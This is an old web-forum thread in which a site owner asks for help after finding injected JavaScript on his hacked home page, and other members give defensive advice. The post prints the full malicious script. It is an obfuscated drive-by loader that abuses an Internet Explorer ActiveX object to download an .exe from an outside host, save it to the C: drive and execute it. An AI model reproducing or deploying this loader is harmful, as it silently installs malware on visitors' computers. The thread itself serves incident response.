Need help with malicious code

Involved Joined: Apr 22, 2006 Posts: 356

I have a site that is simple html. I keep finding a file in the public_html dir. called ftp_info.php, then my home page keeps coming up with some javascript tags in it from ebayautionpros.net and from bidtrust.net. They both reference a js at the directed site. The one on the bidtrust site actually shows you the page and it is this:

Code:

function setCookie (name, value, expires, path, domain, secure) {


bad_tag = name + "=" + escape(value) +


((expires) ? "; expires=" + expires : "") +


((path) ? "; path=" + path : "") +


((domain) ? "; domain=" + domain : "") +


((secure) ? "; secure" : "");


}


function getCookie(name) {


var cookie = " " + bad_tag;


var search = " " + name + "=";


var setStr = null;


var offset = 0;


var end = 0;


if (cookie.length > 0) {


offset = cookie.indexOf(search);


if (offset != -1) {


offset += search.length;


end = cookie.indexOf(";", offset)


if (end == -1) {


end = cookie.length;


}


setStr = unescape(cookie.substring(offset, end));


}


}


return(setStr);


}


function getProperties(obj) {


var properties = ''


for(var propName in obj)


properties += propName+"="+obj[propName]+" , "


return properties


}


function which_browser(){


navigator.DOM=!!(document.getElementById?1:0)


navigator.OPERA=!!(window.opera)


navigator.OPERA5=!!(navigator.OPERA&&navigator.userAgent.indexOf("pera 5")>0)


navigator.IE7=!!(navigator.appVersion.indexOf("IE 7")>0&&navigator.DOM&&!navigator.OPERA?1:0)


navigator.IE6=!!(navigator.appVersion.indexOf("IE 6")>0&&navigator.DOM&&!navigator.OPERA?1:0)


navigator.IE5=!!(navigator.appVersion.indexOf("IE 5")>0&&navigator.DOM&&!navigator.OPERA?1:0)


navigator.IE4=!!(document.all&&!navigator.DOM?1:0)


navigator.IE=!!(navigator.IE4||navigator.IE5||navigator.IE6||navigator.IE7)


navigator.MAC=!!(navigator.userAgent.indexOf("Mac")>0)


navigator.NS6=!!(navigator.DOM && parseInt(navigator.appVersion)>4?1:0)


navigator.NS4=!!(document.layers && !navigator.DOM?1:0)


navigator.DOMCORE1=!!(typeof(document.getElementsByTagName)!='undefined' && typeof(document.createElement)!='undefined')


navigator.DOMCORE2=!!(navigator.DOMCORE1 && typeof(document.getElementById) != 'undefined' && typeof(document.createElementNS) != 'undefined')


navigator.DOMHTML=!!(navigator.DOMCORE1 && typeof(document.getElementById) != 'undefined')


navigator.DOMCSS1=!!(navigator.NS6||navigator.IE)


navigator.DOMCSS2=!!(false)


if(navigator.DOMCORE1){


var element=document.createElement('p')


navigator.DOMCSS2=(typeof(element.style)=='object')


}


navigator.detected=(navigator.IE6||navigator.IE5||navigator.IE4||


navigator.NS6||navigator.NS4||


navigator.OPERA5||navigator.OPERA||


navigator.DOM)


}


which_browser()


var agt=getProperties(navigator).toLowerCase()


var is_winme = ((agt.indexOf("win 9x 4.90")!=-1));


var is_win2k = ((agt.indexOf("windows nt 5.0")!=-1));


var is_winxp = ((agt.indexOf("windows nt 5.1")!=-1));


var is_win2k3 = ((agt.indexOf("windows nt 5.2")!=-1));


var is_cookie = ((agt.indexOf("cookieenabled=true")!=-1));


var execute_wmf = is_winxp || is_win2k3;





if (is_cookie)


{


    if (navigator.IE)


    {


        var my_cookie = getCookie("25425112357");


        if (my_cookie != "41250190239")


        {


            setCookie("25425112357", "41250190239", "Mon, 01-Dec-2007 00:00:00 GMT", "/"); 





var var10010210259=unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%6F%62%6A%5F%52%44%53%20'+


'%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65'+


'%6E%74%28%27%6F%62%6A%65%63%74%27%29%3B%0D%0A%6F%62%6A%5F%52%44%53'+


'%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%27%6F%62'+


'%6A%5F%52%44%53%27%29%3B%0D%0A%6F%62%6A%5F%52%44%53%2E%73%65%74%41'+


'%74%74%72%69%62%75%74%65%28%27%63%6C%61%73%73%69%64%27%2C%27%63%6C'+


'%73%69%64%3A%42%44%39%36%43%35%35%36%2D%36%35%41%33%2D%31%31%44%30'+


'%2D%39%38%33%41%2D%30%30%43%30%34%46%43%32%39%45%33%36%27%29%3B%0D'+


'%0A%74%72%79%0D%0A%7B%0D%0A%76%61%72%20%6F%62%6A%5F%6D%73%78%6D%6C'+


'%32%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65'+


'%63%74%28%22%6D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50%22%2C%22%22'+


'%29%3B%0D%0A%6F%62%6A%5F%6D%73%78%6D%6C%32%2E%6F%70%65%6E%28%22%47'+


'%45%54%22%2C%22%68%74%74%70%3A%2F%2F%62%69%64%74%72%75%73%74%2E%6E'+


'%65%74%2F%67%2F%6E%65%77%62%75%69%6C%64%73%65%72%79%79%2E%65%78%65'+


'%22%2C%66%61%6C%73%65%29%3B%0D%0A%6F%62%6A%5F%6D%73%78%6D%6C%32%2E'+


'%73%65%6E%64%28%29%3B%0D%0A%76%61%72%20%6F%62%6A%5F%53%68%65%6C%6C'+


'%41%70%70%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62'+


'%6A%65%63%74%28%22%53%68%65%6C%6C%2E%41%70%70%6C%69%63%61%74%69%6F'+


'%6E%22%2C%22%22%29%3B%0D%0A%76%61%72%20%6F%62%6A%5F%61%64%6F%64%62'+


'%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65%63'+


'%74%28%22%61%64%6F%64%62%2E%73%74%72%65%61%6D%22%2C%22%22%29%3B%0D'+


'%0A%6F%62%6A%5F%61%64%6F%64%62%2E%74%79%70%65%20%3D%20%31%3B%0D%0A'+


'%6F%62%6A%5F%61%64%6F%64%62%2E%6F%70%65%6E%28%29%3B%0D%0A%6F%62%6A'+


'%5F%61%64%6F%64%62%2E%57%72%69%74%65%28%6F%62%6A%5F%6D%73%78%6D%6C'+


'%32%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%29%3B%0D%0A%76%61%72%20'+


'%66%6E%20%3D%20%22%43%3A%5C%5C%31%37%36%35%36%31%37%39%32%32%36%2E'+


'%65%78%65%22%3B%0D%0A%6F%62%6A%5F%61%64%6F%64%62%2E%53%61%76%65%54'+


'%6F%46%69%6C%65%28%66%6E%2C%32%29%3B%0D%0A%6F%62%6A%5F%53%68%65%6C'+


'%6C%41%70%70%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%28%66%6E%29%3B'+


'%0D%0A%7D%0D%0A%63%61%74%63%68%28%65%29%7B%7D%0D%0A%3C%2F%73%63%72'+


'%69%70%74%3E%0D%0A');


document.write(var10010210259);





var var37458745 =


   unescape(


   "%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%69%64%74%72%75%73%74%2E%6E%65%74%2F"+


   "%74%72%61%66%66%2F%63%6F%75%6E%74%65%72%2E%70%68%70%27%20%77%69%64%74%68%3D%30%20%68%65%69"+


   "%67%68%74%3D%30%3E"


   );


document.write(var37458745);


        }


    }


}

What is this and how can I stop it? The index page is permissioned 644.

Thanks, Kevin

Posted: Wed Sep 13, 2006 2:21 pm

Could be a hacker exploting your system.

You are using HTML only? There are no other scripts running on it?

Posted: Wed Sep 13, 2006 2:24 pm

I guess I mis-spoke, it does use js for navigation and no rightclick and such, there is also a coppermine gallery on a diff. part of the site. The index page is all that has been messed with. I have found this twice in the past couple weeks now. The bidtrust was found just this second time. and uses frontpage extensions

Posted: Wed Sep 13, 2006 2:52 pm

I would start by making sure that you don't have anonymous FTP enabled. Also I'd look at any FTP accounts and make sure that I trust anyone to whom I've allocated them. I would also make sure that the passwords for all FTP accounts are changed and that they are set up as difficult to hack ... no using your pet's name or your own name ... you know that routine. If you have a web administration account I'd change the password on that and make it hard to hack (use a combination of letters, numbers, special characters and not a word that's in the dictionary). Then I'd delete that file you mention and keep looking for it's re-emergence.

You can also look thru your logs and see if there is anything suspicious there, especially if you can narrow down the time when that file got put out there.

Posted: Wed Sep 13, 2006 3:53 pm

I have located the ip of the person doing this from the ftp logs. anonymous is disabled so how are they doing it.

This is the ftp log:

Sun Sep 03 01:09:54 2006 0 209.160.64.108 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 03 01:09:54 2006 0 209.160.64.108 9304 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 03 01:09:54 2006 0 209.160.64.108 9304 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 03 01:09:55 2006 0 209.160.64.108 9365 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 03 13:01:31 2006 0 209.160.64.108 199 /home/myuser/ftp_info.php a _ i r myuser ftp 1 * c
Sun Sep 03 13:01:31 2006 0 209.160.64.108 199 /home/myuser/public_html/ftp_info.php a _ i r myuser ftp 1 * c
Sat Sep 09 01:47:28 2006 0 209.25.195.66 9365 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 01:47:28 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 01:47:29 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 01:47:29 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 05:38:09 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 05:38:09 2006 0 209.25.195.66 9301 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 05:38:10 2006 0 209.25.195.66 9301 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 05:38:10 2006 0 209.25.195.66 9359 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 10 00:34:40 2006 0 209.25.195.66 9359 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 10 00:34:41 2006 0 209.25.195.66 9419 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 10 00:34:41 2006 0 209.25.195.66 9419 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 10 00:34:42 2006 0 209.25.195.66 9479 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c

So what do I do now?

Thanks, Kevin

Posted: Wed Sep 13, 2006 4:03 pm

Coppermine could be the culprit. There maybe other backdoors in your system, you would need to work with your host to find out. I don't know if there's another exploit that would be affect the html files, perhaps they did something else like target your web server software.

Posted: Wed Sep 13, 2006 4:59 pm

As Evaders said it could be Coppermine.

Do you have FTP accounts set up? If so, I'd get rid of all but your own and change the password on it. In the shared web hosting arrangement I'm familiar with (IPOWERWEB) the main admin account has control over the FTP accounts and I'm pretty sure it's the same in a CPANEL system.

I'd also add a
deny from 209.25.195.66
to my .htaccess file

Someone who knows more about servers than I can probably address whether that will be effective against the type of attack in your log.

Posted: Wed Sep 13, 2006 5:44 pm

Thanks for the replies

Posted: Thu Sep 14, 2006 9:16 am

If files are showing up on your system it could any number of exploits. The current popular ones are the phpbb admin XSS and the php 777 hack. Do you have the most current sentinel version? Do you have any folders in your system that are CHMOD to 777?

Are you using coppermine, spchat, or vwar?

Posted: Thu Sep 14, 2006 9:26 am

I have coppermine. I have changed some folders that were 777 to 755 and made sure all files are 644. I am not using nuke on the site. I have now had the ip blocked via apf.